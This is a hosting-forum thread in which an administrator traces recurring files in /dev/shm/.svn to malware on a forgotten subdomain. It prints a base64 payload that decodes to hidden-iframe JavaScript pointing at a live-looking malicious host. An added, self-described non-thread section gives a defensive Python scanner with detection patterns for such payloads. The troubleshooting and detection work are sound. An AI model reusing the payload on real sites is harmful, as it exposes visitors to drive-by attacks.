Suspicious files

Thanks John, I did already check that (actually it was almost the first thing I did check), but there is no cron for that user...

Usually I manage to find bad pages and code.. but this time.. I feel sad because it has been a month or more that I'm in this situation and I have to apply workarounds like this:

chmod 700 /dev/shm/.svn
chown root:root /dev/shm/.svn

to prevent the script from writing to/using that folder

Regards
 
I would just pay a security expert to look at it if you are quite concerned. I have no other ideas without looking at it myself. This could even be encoded such as the eval statement you found before. You could also post on larger forums such as webhostingtalk.com to see what they say.
 
It's not that I'm in a panic, it's just too bad that I cannot find out by myself what it is. Actually, the script can't run; the workaround is just so I don't get csf emails... So actually it looks not like a high security risk but just a "warning".

Thanks for your help.

Regards
 
@SeLLeRoNe You have probably done most of this already, but here is my thought: I would ask the customer to deactivate and delete any WordPress plugin that is not absolutely needed, and also delete any WordPress theme that is not used anymore. If the problem then still continues, I would download a new fresh copy of WordPress from wordpress.org, and then delete all files in the wp-includes and wp-admin directories and all WordPress installation files in public_html, so that you only keep his plugins and images etc., and then upload the new fresh files. I would even delete wp-config.php and generate it manually again. Create a new database password. Then also ask the customer to change his WordPress admin password. I would also manually look in wp-includes/uploads for php files and in the wp-includes/plugins folders for files and content that would not belong there.

Edit: Maybe ask in WordPress own forum at http://wordpress.org/support/
 
A .svn folder indicates that someone attempted to do a checkout of an svn repository. It could be that it was a rogue script or plugin doing something. Instead of looking for .svn, look for something like 'svn co' or 'svn checkout', which would be the command used to check out a source tree. In turn it would also create a .svn folder that would contain pristine copies of files that may be worked on in the working directory (the directory that contains the .svn folder), plus it should have a few other files. What was the content of that directory? There is normally a clue in that directory as to where the repository was, since that is how svn knows which repository to update the files from.

Perhaps it was someone trying to inject a virus using svn to pull it down, and removed the working one to hide his/her tracks but overlooked the .svn directory.
 
Thanks for this hint, I did think as well about a temp svn check for updates or so.

This is the output:

All the files that have 'svn co' are the timthumb.php files and they have this:

Code:
        3. Check-out the latest version of CutyCapt with the following command: svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt

Could it be related?

No references to 'svn checkout'.

Thanks
 
You could try executing that command
Code:
svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt
and comparing the contents of that checkout's .svn folder to the one you have in /dev/shm; if they are the same, then that is where it came from. Doing the svn co will not execute or install anything bad, it will only copy files down from the repository.
 
This is the content:

Code:
totale 4,0K
-rwxrwxrwx 1 username username   0 14 set 19:58 120914
-rwxrwxrwx 1 username username   0 14 set 19:55 312294301bf0cc7df00be903d4422b01112091405
-rwxrwxrwx 1 username username 316 14 set 19:55 312294301bf0cc7df00be903d4422b0112091405
-rw-r--r-- 1 username username   0 14 set 19:55 r

All files are empty except this:

Code:
>cat 312294301bf0cc7df00be903d4422b0112091405
Yzg3YTRvMWs9JzxpZnJhbWUgc3JjPSJodHRwOi8vY29udC1yaWJ1dGUuY29tLmJyLnRjOjgxL3JlbTIuaHRtbCIgZnJhbWVib3JkZXI9MCBtYXJnaW5oZWlnaHQ9MCBtYXJnaW53aWR0aD0wIHNjcm9sbGluZz0ibm8iIGFsbG93VHJhbnNwYXJlbmN5PSJ0cnVlIiBzdHlsZT0id2lkdGg6NDhweDtwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0yMTcwcHg7Ij48L2lmcmFtZT4nOyBkb2N1bWVudC53cml0ZShjODdhNG8xayk7

Regards
 
Yeah, I did the co and looked at it, there wasn't a match. The code you show looks like it is some encrypted javascript. After decrypting the contents here http://www5.rptea.com/base64/ it is someone trying to inject an iframe into some html, then trying to load a buttload of urls on the 95.211.193.19 ip address. This is not some benign code.
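The blob in that file is plain base64 of a one-line JavaScript snippet that writes an iframe with document.write and pushes it off-screen with a negative left offset. The following is an added example, not code from this thread or from any of the posters: a small Python scanner that pulls base64 runs out of a file, decodes them, and flags the indicators seen here (iframe, document.write, off-screen positioning), plus the raw PHP eval(base64_decode(...)) loader mentioned earlier in the thread. The 40-character run threshold and the indicator patterns are assumptions, and the sample blobs are constructed with a placeholder host rather than the real URL.

```python
import base64
import binascii
import re

# A "run" of base64 text: at least 40 unbroken alphabet characters, optional padding.
# The length threshold is an assumption; shorter runs are mostly ordinary words or hashes.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

# Loader pattern checked on the raw (not yet decoded) text, e.g. PHP eval(base64_decode("...")).
EVAL_OF_BASE64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)

# Indicators checked on the decoded bytes. They mirror what the thread's blob decoded to:
# an <iframe> emitted through document.write and pushed off-screen with a negative offset.
DECODED_INDICATORS = {
    "iframe": re.compile(rb"<iframe\b", re.I),
    "document_write": re.compile(rb"document\.write\s*\(", re.I),
    "offscreen": re.compile(rb"position\s*:\s*absolute[^>']*?(?:left|top)\s*:\s*-\d+px", re.I),
}


def decode_candidates(data):
    """Yield (encoded_run, decoded_bytes) for every base64 run in data that decodes cleanly."""
    for match in B64_RUN.finditer(data):
        run = match.group(0)
        # Pad to a multiple of 4 so an unpadded run (the 316-byte file in the thread carries
        # no '=' at all) still decodes under strict validation; bad lengths simply fail.
        padded = run + b"=" * (-len(run) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            continue
        yield run, decoded


def scan(data):
    """Return findings for one file's bytes.

    Each finding is a dict with the indicator names that fired and, for decoded
    base64 runs, the decoded text (None for the raw eval/base64_decode loader match).
    """
    findings = []
    if EVAL_OF_BASE64.search(data):
        findings.append({"indicators": ["eval_of_base64"], "decoded": None})
    for _run, decoded in decode_candidates(data):
        hits = sorted(name for name, rx in DECODED_INDICATORS.items() if rx.search(decoded))
        if hits:
            findings.append({"indicators": hits, "decoded": decoded.decode("latin-1")})
    return findings


def scan_files(paths):
    """Scan the given file paths; returns {path: findings} for files with at least one finding."""
    report = {}
    for path in paths:
        with open(path, "rb") as fh:
            found = scan(fh.read())
        if found:
            report[path] = found
    return report


# --- Constructed samples (placeholder host, not the thread's real URL) --------------------
_HIDDEN_IFRAME_JS = (
    b"v1='<iframe src=\"http://malicious.example/x.html\" frameborder=0 "
    b"style=\"width:48px;position:absolute;left:-2170px;\"></iframe>'; "
    b"document.write(v1);"
)
SAMPLE_BLOB = base64.b64encode(_HIDDEN_IFRAME_JS)            # shaped like the /dev/shm/.svn file
SAMPLE_PHP_LOADER = b'<?php eval(base64_decode("' + SAMPLE_BLOB + b'")); ?>'
BENIGN_BLOB = base64.b64encode(b"An ordinary note stored in a temp directory, nothing suspicious here.")

if __name__ == "__main__":
    import sys
    # usage: python scan_b64.py /path/to/webroot/**/*.php (paths supplied by the caller)
    for path, found in scan_files(sys.argv[1:]).items():
        for f in found:
            print(f"{path}: {', '.join(f['indicators'])}")
```

Running it over a web root catches both the dropped payload file and a PHP page that loads such a payload through eval, which is the kind of reference the thread is looking for; a decoded hit also gives you the plain text to grep the rest of the site for.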
 
I did a wget (so it would only download the html not execute anything) on the URL embedded in the script and looked at the code there. It was in the res2.html file.
 
Oh ok :) But I can't see any ref in the logs.. so.. the original attacker of course does not use that page or those IPs...

That sucks

Thanks for your help
 
I doubt you will see them in your logs, since they were meant for users browsing a page on your server to execute that code. Their browser would be doing all the decoding/executing and opening all those pages. The trick now is to find out where it is coming from to make sure no one gets to execute that script. Somewhere there has to be a reference to it. The sad part, is that the infected code could be encrypted too like the contents here and finding it would be difficult. You may want to take a few lines of characters from that file and do a search for that, to see if any files contain it.
 
Checked for references to single parts of the code and to the file names, but none came out.

Probably it is a bot, because the only folder it places those files in is /dev/shm/.svn

Damn them
 
I wanna thank everyone.

I did finally find and solve the problem.

The customer has an unlinked subdomain (so I didn't notice it and check it) with malware in the homepage.

Once I noticed that subdomain I did a scan with http://sucuri.net/ and this website notified me about the malware.

To do that I moved all folders to a non-web area and put them back one by one with a 3-hour delay between every folder; once I put the last one back and visited the site, the .svn folder reappeared. The website was offline and not linked, it was just for backup.. but it was insecure, so with my customer we decided to remove it definitively.

Also note that the DB did not have any reference to the malware, so it was some encoded code inside the pages.

The page had encrypted JavaScript code that was creating an iframe to a remote site.

Thanks everyone for the support and suggestions.

Best regards
 